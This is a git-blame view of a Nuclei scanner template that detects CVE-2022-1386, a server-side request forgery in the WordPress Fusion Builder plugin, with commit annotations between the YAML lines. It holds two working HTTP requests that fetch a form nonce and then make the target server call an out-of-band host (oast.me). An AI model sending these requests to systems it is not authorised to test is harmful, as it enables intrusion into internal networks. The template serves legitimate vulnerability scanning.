daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2022/CVE-2022-1386.yaml

109 lines
4.3 KiB
YAML
Raw Normal View History

Added CVE-2022-1386 (#4898)
2022-07-23 13:38:58 +00:00
id: CVE-2022-1386
info:
Enhancement: cves/2022/CVE-2022-1386.yaml by md
2023-04-06 21:41:10 +00:00
name: WordPress Fusion Builder <3.6.2 - Server-Side Request Forgery
Added CVE-2022-1386 (#4898)
2022-07-23 13:38:58 +00:00
author: akincibor,MantisSTS,calumjelrick
severity: critical
description: |
Enhancement: cves/2022/CVE-2022-1386.yaml by md
2023-04-06 22:38:20 +00:00
WordPress Fusion Builder plugin before 3.6.2 is susceptible to server-side request forgery. The plugin does not validate a parameter in its forms, which can be used to initiate arbitrary HTTP requests. The data returned is then reflected back in the application's response. An attacker can potentially interact with hosts on the server's local network, bypass firewalls, and access control measures.
Added Impact
2023-09-27 15:51:13 +00:00
impact: |
An attacker can exploit this vulnerability to make requests to internal resources, potentially leading to unauthorized access or information disclosure.
updated 2022 CVEs
2023-09-06 11:59:08 +00:00
remediation: |
Update to the latest version of WordPress Fusion Builder plugin (3.6.2) or apply the vendor-provided patch.
Added CVE-2022-1386 (#4898)
2022-07-23 13:38:58 +00:00
reference:
- https://wpscan.com/vulnerability/bf7034ab-24c4-461f-a709-3f73988b536b
- https://www.rootshellsecurity.net/rootshell-discovered-a-critical-vulnerability-in-top-wordpress-theme/
- https://theme-fusion.com/version-7-6-2-security-update/
Enhancement: cves/2022/CVE-2022-1386.yaml by md
2023-04-06 21:41:10 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-1386
TemplateMan Update [Sat Mar 23 09:28:19 UTC 2024] :robot:
2024-03-23 09:28:19 +00:00
- https://github.com/ARPSyndicate/kenzer-templates
Added CVE-2022-1386 (#4898)
2022-07-23 13:38:58 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-1386
cwe-id: CWE-918
product/queries updated
2024-05-31 19:23:20 +00:00
epss-score: 0.26067
epss-percentile: 0.96717
TemplateMan Update [Sat Mar 23 09:28:19 UTC 2024] :robot:
2024-03-23 09:28:19 +00:00
cpe: cpe:2.3:a:fusion_builder_project:fusion_builder:*:*:*:*:*:wordpress:*:*
Added max request counter of each template
2023-04-28 08:11:21 +00:00
metadata:
max-request: 2
TemplateMan Update [Sat Mar 23 09:28:19 UTC 2024] :robot:
2024-03-23 09:28:19 +00:00
vendor: fusion_builder_project
product: fusion_builder
updated 2022 CVEs
2023-09-06 11:59:08 +00:00
framework: wordpress
TemplateMan Update [Fri Jun 7 10:04:28 UTC 2024] :robot:
2024-06-07 10:04:29 +00:00
tags: cve,cve2022,wpscan,wordpress,ssrf,themefusion,wp,fusion,avada,intrusive,theme-fusion,fusion_builder_project
Added CVE-2022-1386 (#4898)
2022-07-23 13:38:58 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com>
2023-04-27 04:28:59 +00:00
http:
Added CVE-2022-1386 (#4898)
2022-07-23 13:38:58 +00:00
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: {{BaseURL}}
Referer: {{RootURL}}
action=fusion_form_update_view
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=---------------------------30259827232283860776499538268
Origin: {{BaseURL}}
Referer: {{RootURL}}
-----------------------------30259827232283860776499538268
Content-Disposition: form-data; name="formData"
updated example and evil.com domains
2024-07-23 12:51:51 +00:00
email=example%40oast.me&fusion_privacy_store_ip_ua=false&fusion_privacy_expiration_interval=48&priva
Added CVE-2022-1386 (#4898)
2022-07-23 13:38:58 +00:00
cy_expiration_action=ignore&fusion-form-nonce-0={{fusionformnonce}}&fusion-fields-hold-private-data=
-----------------------------30259827232283860776499538268
Content-Disposition: form-data; name="action"
fusion_form_submit_form_to_url
-----------------------------30259827232283860776499538268
Content-Disposition: form-data; name="fusion_form_nonce"
{{fusionformnonce}}
-----------------------------30259827232283860776499538268
Content-Disposition: form-data; name="form_id"
0
-----------------------------30259827232283860776499538268
Content-Disposition: form-data; name="post_id"
0
-----------------------------30259827232283860776499538268
Content-Disposition: form-data; name="field_labels"
{"email":"Email address"}
-----------------------------30259827232283860776499538268
Content-Disposition: form-data; name="hidden_field_names"
[]
-----------------------------30259827232283860776499538268
Content-Disposition: form-data; name="fusionAction"
https://oast.me
-----------------------------30259827232283860776499538268
Content-Disposition: form-data; name="fusionActionMethod"
GET
-----------------------------30259827232283860776499538268--
matchers-condition: and
matchers:
- type: word
part: body_2
words:
CVE Enrichment :tada:
2023-07-11 19:49:27 +00:00
- Interactsh Server
Added CVE-2022-1386 (#4898)
2022-07-23 13:38:58 +00:00
- type: status
status:
- 200
CVE Enrichment :tada:
2023-07-11 19:49:27 +00:00
extractors:
- type: xpath
name: fusionformnonce
internal: true
xpath:
- //*[@id="fusion-form-nonce-0"]
attribute: value
part: body_1
Auto Template Signing [Fri Jul 26 13:07:14 UTC 2024] :robot:
2024-07-26 13:07:14 +00:00
# digest: 490a0046304402205ac7cfbfff322a01bde1ba986c6cbb110f2bb3e239d6f114bea52762537c040102200c7d52565cd32eb1d8ef46a60bc821bcf76e8324527a861ac6919a3df5782410:922c64590222798bb761d5b6d8e72950